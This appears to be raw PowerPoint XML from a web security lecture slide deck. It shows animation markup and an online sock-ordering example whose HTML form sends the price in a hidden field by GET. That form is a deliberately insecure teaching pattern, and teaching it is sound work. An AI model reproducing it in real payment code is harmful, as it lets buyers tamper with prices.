                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="10" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="11" presetID="9" presetClass="entr" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="454"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45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458"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="450"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="450"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.000000 0.000000 L -0.371811 -0.001034" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1200" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="454"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1200"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="454"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1200"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="450"/>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459"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="453"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="453"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="42" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="43" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.000000 0.000000 L 0.060133 -0.102905" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="455"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="45" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="46" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.060133 -0.102905 L 0.304708 -0.102355" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="900" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="455"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.304708 -0.102355 L 0.372022 -0.001560" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="455"/>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9" presetClass="entr" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="456"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="5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animBg="1" advAuto="0"/>
      <p:bldP spid="450" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="453" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="453" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="454" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="454" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="455" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="456" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="457" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="458" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="459" grpId="0"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1" name="Ex: Online ordering"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530149" y="507593"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Ex: Online ordering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="468" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4167306" y="3795407"/>
            <a:ext cx="6663116" cy="6128163"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="6663115" cy="6128161"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="462" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="32666"/>
              <a:ext cx="6663116" cy="6098473"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="FBFBFB"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="BEBEBE"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
            </a:gra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pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="463" name="Order"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2301115" y="2976"/>
              <a:ext cx="206088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latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Order</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="464" name="socks.jpg" descr="socks.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="645197" y="1875460"/>
              <a:ext cx="2461728" cy="2412884"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="465" name="$5.50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1003748" y="4318198"/>
              <a:ext cx="174462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rgbClr val="1333FF"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>$5.50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="466" name="Order"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3487951" y="2530111"/>
              <a:ext cx="2678907" cy="1103582"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 17262"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:satOff val="-3355"/>
                <a:lumOff val="26614"/>
              </a:schemeClr>
            </a:solid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4400" b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Order</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="467" name="Arrow"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13812239">
              <a:off x="5402004" y="3373304"/>
              <a:ext cx="831212" cy="669141"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 32000"/>
                <a:gd name="adj2" fmla="val 45511"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="477" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13490869" y="2724350"/>
            <a:ext cx="6663117" cy="7199220"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="6663115" cy="7199218"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="475" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="1074033"/>
              <a:ext cx="6663116" cy="6128162"/>
              <a:chOff x="0" y="2976"/>
              <a:chExt cx="6663115" cy="6128161"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="469" name="Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="32666"/>
                <a:ext cx="6663116" cy="6098473"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FBFBFB"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="BEBEBE"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gra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pPr>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="470" name="Pay"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2682177" y="2976"/>
                <a:ext cx="1298762"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latin typeface="Courier"/>
                    <a:ea typeface="Courier"/>
                    <a:cs typeface="Courier"/>
                    <a:sym typeface="Courier"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>Pay</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="471" name="The total cost is $5.50. Confirm order?"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="543486" y="1777268"/>
                <a:ext cx="5576144" cy="13620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defRPr sz="4000" b="1">
                    <a:solidFill>
                      <a:srgbClr val="1333FF"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica"/>
                    <a:ea typeface="Helvetica"/>
                    <a:cs typeface="Helvetica"/>
                    <a:sym typeface="Helvetica"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:t>The total cost is $5.50.</a:t>
                </a:r>
                <a:br/>
                <a:r>
                  <a:t>Confirm order?</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="472" name="Yes"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="486220" y="4005783"/>
                <a:ext cx="2678907" cy="1103582"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 17262"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:satOff val="-3355"/>
                  <a:lumOff val="26614"/>
                </a:schemeClr>
              </a:solid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4400" b="1">
                    <a:latin typeface="Helvetica"/>
                    <a:ea typeface="Helvetica"/>
                    <a:cs typeface="Helvetica"/>
                    <a:sym typeface="Helvetica"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>Yes</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="473" name="Arrow"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="13812239">
                <a:off x="2473019" y="4852395"/>
                <a:ext cx="831212" cy="669140"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrow">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 32000"/>
                  <a:gd name="adj2" fmla="val 45511"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solid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474" name="No"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3526446" y="4005783"/>
                <a:ext cx="2678908" cy="1103582"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 17262"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:satOff val="-3355"/>
                  <a:lumOff val="26614"/>
                </a:schemeClr>
              </a:solid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4400" b="1">
                    <a:latin typeface="Helvetica"/>
                    <a:ea typeface="Helvetica"/>
                    <a:cs typeface="Helvetica"/>
                    <a:sym typeface="Helvetica"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>No</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="476" name="socks.com/pay.php"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14743" y="2976"/>
              <a:ext cx="6633630"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defRPr u="sng">
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:hlinkClick r:id="rId3"/>
                </a:rPr>
                <a:t>socks.com</a:t>
              </a:r>
              <a:r>
                <a:t>/pay.php</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="socks.com/order.php"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800987" y="2724350"/>
            <a:ext cx="7395754"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u="sng">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>socks.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>/order.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Separate page"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14627232" y="10363045"/>
            <a:ext cx="43903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Separate page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13453477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0" animBg="1" advAuto="0"/>
      <p:bldP spid="479" grpId="0" animBg="1" advAuto="0"/>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 name="&lt;html&gt;…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4415005" y="4519710"/>
            <a:ext cx="15545396" cy="77882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200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;head&gt; &lt;title&gt;Pay&lt;/title&gt; &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;form action=“submit_order” method=“GET”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>The total cost is $5.50. Confirm order?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;input type=“hidden” name=“price” value=“5.50”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;input type=“submit” name=“pay” value=“yes”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;input type=“submit” name=“pay” value=“no”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="What’s presented to the user"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7768276" y="2999090"/>
            <a:ext cx="8847448"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What’s presented to the user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413251" y="8358096"/>
            <a:ext cx="15972270" cy="723223"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 26340"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
